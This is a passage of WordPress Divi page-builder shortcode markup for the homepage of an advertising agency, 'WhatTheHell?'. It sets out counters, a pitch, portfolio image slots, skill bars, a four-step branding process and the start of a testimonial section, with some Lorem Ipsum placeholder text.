animation_intensity_slide=\"4%\"]<h2><span style=\"color: #ffffff;\">Generating New Ideas. Solving real Problems</span></h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Ideas are relevant if it has power to solve the real problem at hand. We are always keen on working practical ideas in the realtime business atmosphere.</p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_4,1_4,1_4,1_4\" admin_label=\"Fun Fact\" _builder_version=\"3.25\" custom_margin=\"|||\" custom_padding=\"40px||40px|\" animation_style=\"zoom\" animation_direction=\"top\" animation_intensity_zoom=\"10%\"][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Projects\" number=\"350\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Satisfied Clients\" number=\"62\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"100ms\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Ongoing Projects\" number=\"16\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"200ms\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Cups Of Coffee\" number=\"906\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"300ms\"][/et_pb_number_counter][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Feature Section\" _builder_version=\"4.4.9\" custom_margin=\"|||\" custom_padding=\"50px||3px||false|false\"][et_pb_row column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" gutter_width=\"4\" custom_padding_last_edited=\"on|phone\" admin_label=\"Feature\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"4.5.1\" width=\"86%\" width_tablet=\"80%\" width_phone=\"\" width_last_edited=\"on|desktop\" max_width=\"86%\" max_width_tablet=\"80%\" max_width_phone=\"\" max_width_last_edited=\"on|desktop\" custom_padding=\"40px||23px||false|false\" custom_padding_tablet=\"\" custom_padding_phone=\"0px||||false|false\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/Why-we.png\" alt=\"Why We creative agency\" title_text=\"Why we\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" custom_margin=\"61px|||||\" custom_margin_tablet=\"\" custom_margin_phone=\"0px||||false|false\" custom_margin_last_edited=\"on|phone\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"8%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"7%||7%|\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" locked=\"off\"]<h2><span>Why choose us?</span></h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" locked=\"off\"]<p><span>WhatTheHell? is not some advertising, digital and design agency. An irreverent ideas farm seems more like it. Always eager to work with people who are looking to do brilliant things to their brands.</span></p>\n<p> <span>We help in realizing brand aspirations through our in-depth research &amp; analytics and translate them into irreverent creative ideas. We always remember that there’s more to marketing communication than top-funnel awareness building through BTL, ATL, Outdoor, or Digital Media Publishing.</span></p>[/et_pb_text][et_pb_button button_url=\"#\" button_text=\"Learn More\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Latest Work Section\" _builder_version=\"4.4.9\" background_color=\"#f7f7f7\" custom_padding=\"50px||50px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"|auto|2px|auto||\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Latest Work</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>Creative &amp; Effective work around practical marketing problems. Next update will have your creatives.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"0px\" admin_label=\"Work Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_phone=\"\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" inner_max_width_phone=\"\" inner_max_width_last_edited=\"on|desktop\" custom_padding=\"0px|5%|0px|5%\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/434x434.jpg\" title_text=\"434x434\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" animation_style=\"flip\" animation_intensity_flip=\"30%\" hover_enabled=\"0\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner _builder_version=\"3.25\" custom_padding=\"0px||0px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/217x434.jpg\" title_text=\"217x434\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" hover_enabled=\"0\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" _builder_version=\"4.5.2\" custom_padding=\"0px||0px|\" hover_enabled=\"0\" custom_margin=\"12px||||false|false\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/217x217.jpg\" title_text=\"217x217\" url=\"#\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" hover_enabled=\"0\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/home-office-04-1.jpg\" title_text=\"home-office-04-1\" url=\"#\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" animation_style=\"flip\" animation_intensity_flip=\"30%\" hover_enabled=\"0\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Button Section\" _builder_version=\"4.4.9\" background_color=\"#f7f7f7\" custom_padding=\"0px||50px||false|false\"][et_pb_row _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_button button_url=\"#\" button_text=\"See More\" button_alignment=\"center\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Skill Section\" _builder_version=\"4.4.9\" custom_padding=\"50px||50px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Skills</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.1\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>We have a dedicated team to build new tools and technique, to complete the day today repetitive work with precision.</p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Skill\" _builder_version=\"3.25\" custom_padding=\"20px||10px|\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"flip\" animation_intensity_flip=\"20%\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It is a long established fact that a reader. It was popularised in the 1960s with the release.\r[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_counters bar_bg_color=\"#d4b068\" use_percentages=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|||||\" title_text_color=\"#353740\" title_font_size=\"12px\" title_letter_spacing=\"1px\" title_line_height=\"2em\" percent_font_size=\"1px\" custom_padding=\"|||\" animation_style=\"fold\" animation_direction=\"left\" animation_intensity_fold=\"30%\"][et_pb_counter percent=\"90\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Branding - 90%\r[/et_pb_counter][et_pb_counter percent=\"77\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Lead/Sales Generation Campaign - 77%\r[/et_pb_counter][et_pb_counter percent=\"85%\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Digital Advertising - 85%\r[/et_pb_counter][/et_pb_counters][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Gradient Background Color Section\" _builder_version=\"4.5.2\" background_color_gradient_direction=\"90deg\" background_image=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/Artboard-4.png\" custom_margin=\"||78px|\" custom_margin_tablet=\"||0px|\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"10%||0px|\"][et_pb_row _builder_version=\"3.25\" custom_padding=\"0px|0px|0px|0px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/Artboard-Copy-12.png\" alt=\"Best Advertising agency\" title_text=\"best advertising agency\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" custom_margin=\"||-56px|\" custom_margin_tablet=\"||10%|\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"left\" animation_duration=\"1500ms\" animation_intensity_slide=\"10%\" animation_starting_opacity=\"100%\" locked=\"off\"][/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Quote Section\" _builder_version=\"3.22\" custom_margin=\"40px||50px|\"][et_pb_row admin_label=\"Quote\" _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Quote\" _builder_version=\"4.5.2\" text_text_color=\"#747d88\" text_font_size=\"24px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"flip\" animation_direction=\"top\" animation_intensity_flip=\"20%\"]<p>NOBODY READS ADS, PEOPLE READ WHAT INTERESTS THEM &amp; SOMETIME IT\'S AN AD</p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"140px\" padding_top_2=\"0px\" padding_left_1=\"10%\" admin_label=\"Feature Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_phone=\"\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" inner_max_width_phone=\"\" inner_max_width_last_edited=\"on|desktop\" custom_margin=\"|||\" custom_padding=\"0px||3px|||\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"100px\" box_shadow_color=\"#ffffff\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_left__hover=\"10%\" padding_top__hover=\"140px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Feature Titile\" _builder_version=\"3.25\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"||10px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" locked=\"off\"]<h2><span>Easy to start</span></h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" locked=\"off\"]<div class=\"lp-element lp-pom-text nlh\" id=\"lp-pom-text-216\">\n<p><strong><em>Just four steps</em></strong></p>\n<p><strong><em></em></strong></p>\n</div>\n<div class=\"lp-element lp-pom-text nlh\" id=\"lp-pom-text-217\">\n<p>We had adopted proven workflow to produce consistent result, but never hesitate to cross the lines and work differently.</p>\n</div>[/et_pb_text][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Features\" _builder_version=\"3.25\" width=\"100%\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"|0px|4px|||\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"01. BRAND AUDIT\" use_icon=\"on\" font_icon=\"%%57%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_margin=\"||26px|||\" animation_style=\"fade\" animation_direction=\"bottom\"]<p style=\"text-align: center;\"><span>Analyzing the brand with all the key parameter (As per operating environment and competition)</span></p>[/et_pb_blurb][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"02. STRATEGY\" use_icon=\"on\" font_icon=\"%%369%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" width=\"98.9%\" custom_margin=\"||26px||false|false\" custom_padding=\"||||false|false\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\"]<p><span>Starting with the summary of the plan, Defining TG, Writing/Creating USP</span></p>\n<p><span></span></p>[/et_pb_blurb][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Features\" _builder_version=\"3.25\" width=\"100%\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"|0px||||\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"03. EXECUTION\" use_icon=\"on\" font_icon=\"%%57%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_margin=\"||26px|||\" animation_style=\"fade\" animation_direction=\"bottom\"]<div><span>Creative Development, Setting up the visual identity, implementing the IMC(Integrated Marketing Communication)</span></div>[/et_pb_blurb][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"04. EVALUATION\" use_icon=\"on\" font_icon=\"%%369%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" width=\"98.9%\" custom_margin=\"||43px||false|false\" custom_padding=\"||||false|false\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\"]<div dir=\"ltr\"><span>The fourth but the most important step is evaluation, adaptation and reporting. To improvise future performance.</span></div>\n<p><span></span></p>[/et_pb_blurb][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/Artboard-5.jpg\" alt=\"marketing strategy\" title_text=\"marketing strategy\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" custom_margin=\"|||\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"6%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Testimonial Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"50px||50px|||\"][et_pb_row admin_label=\"Testimonial Title\" _builder_version=\"3.25\" custom_margin=\"|||\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"Montserrat|on||on|\" text_text_color=\"#353740\" text_font_size=\"42px\" text_line_height=\"1.2em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\"]<p>From Our Clients</p>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"600px\" module_alignment=\"center\" custom_margin=\"|||\"]<p>Best Advertising Is Done By Satisfied Customers. We Believe &amp; Nurture It In Our Business.</p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Testimonial\" _builder_version=\"3.25\" custom_padding=\"|||\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"Mitch Skolnik\" job_title=\"operation Director\" company_name=\"Elegant Themes\" 